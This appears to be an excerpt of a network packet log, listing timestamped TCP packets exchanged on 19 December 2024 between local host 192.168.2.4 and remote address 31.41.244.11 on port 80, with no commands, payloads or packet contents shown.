                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.381794930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.381844997 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.382993937 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.383045912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.383070946 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.383126974 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.384334087 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.384362936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.384434938 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.385394096 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.385443926 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.385499954 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.385545969 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.386600971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.386667967 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.386722088 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.386766911 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.387835979 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.387886047 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.387940884 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.387985945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.389050961 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.389106035 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.389153004 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.389195919 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.390250921 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.390314102 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.390361071 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.390418053 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.391474009 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.391530037 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.391585112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.391680956 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.392680883 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.392740965 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.392793894 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.392841101 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.393959999 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.394031048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.394078016 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.394124985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.395117998 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.395185947 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.395247936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.395301104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.396352053 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.396421909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.396475077 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.396523952 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.397572994 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.397624969 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.397697926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.397747993 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.398777962 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.398839951 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.398896933 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.398948908 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.399990082 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.400043964 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.400132895 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.400186062 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.401237965 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.401297092 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.401351929 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.401403904 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.402417898 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.402475119 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.402543068 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.402594090 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.403692961 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.403753996 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.403779984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.403831005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.404866934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.404916048 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.404992104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.405045033 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.406069040 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.406122923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.406171083 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.406236887 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.407327890 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.407378912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.407454967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.407506943 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.408555031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.408608913 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.408610106 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.408659935 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.409744024 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.409796953 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.409884930 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.409954071 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.410959005 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.411012888 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.411063910 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.411117077 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.412205935 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.412261963 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.412285089 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.412333965 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.413450003 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.413506985 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.413575888 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.413626909 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.414629936 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.414683104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.414741039 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.414797068 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.415863991 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.415901899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.415947914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.415947914 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.417021036 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.417083025 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.417145967 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.417191982 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.418231010 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.418291092 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.418359041 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.418463945 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.419475079 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.419524908 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.419615030 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.419667959 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.420663118 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.420715094 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.420804024 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.420859098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.421870947 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.421931028 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.421951056 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.422003984 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.423041105 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.423094988 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549069881 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549114943 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549141884 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549200058 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549459934 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549514055 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549566984 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.549616098 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.550244093 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.550296068 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.550370932 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.550431013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.551296949 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.551364899 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.551379919 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.551430941 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.552352905 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.552414894 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.552463055 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.552515030 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.553383112 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.553455114 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.553499937 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.553553104 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.554461956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.554517031 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.554563046 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.554563046 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.555464983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.555519104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.555529118 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.555576086 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.556523085 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.556581020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.556657076 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.556710005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.557620049 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.557674885 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.557749987 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.557804108 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.558624983 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.558686018 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.558752060 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.558804989 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.559624910 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.559683084 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.559758902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.559813976 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.560671091 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.560724974 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.560781956 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.560833931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.561702013 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.561754942 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.561822891 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.561872005 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.562727928 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.562803030 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.562866926 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.562922001 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.563811064 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.563864946 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.563915968 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.563961029 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.564887047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.564946890 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.565023899 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.565082073 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.565983057 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.566047907 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.566117048 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.566170931 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.566993952 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.567049980 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.567080975 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.567112923 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.567955971 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.568038940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.568080902 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.568186045 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.568988085 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.569061995 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.569133997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.569199085 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.570028067 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.570086002 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.570161104 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.570215940 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.571115017 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.571182013 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.571183920 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.571238041 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.572134018 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.572202921 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.572242975 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.572295904 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.573153019 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.573209047 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.573281050 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.573334932 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.574197054 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.574263096 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.574347019 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.574400902 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.575242043 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.575305939 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.575391054 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.575457096 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.576293945 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.576349020 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.576404095 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.576457977 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.577315092 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.577373981 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.577447891 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.577502012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.578372002 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.578435898 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.578485012 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.578596115 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.579404116 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.579464912 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.579529047 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.579581976 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.580456018 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.580512047 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.580588102 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.580641031 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.581476927 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.581543922 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.581598997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.581655979 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.582521915 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.582576990 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.582581043 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.582628012 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.583564997 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.583621979 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.583695889 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.583743095 CET4978780192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.584621906 CET804978731.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:21.584678888 CET4978780192.168.2.431.41.244.11
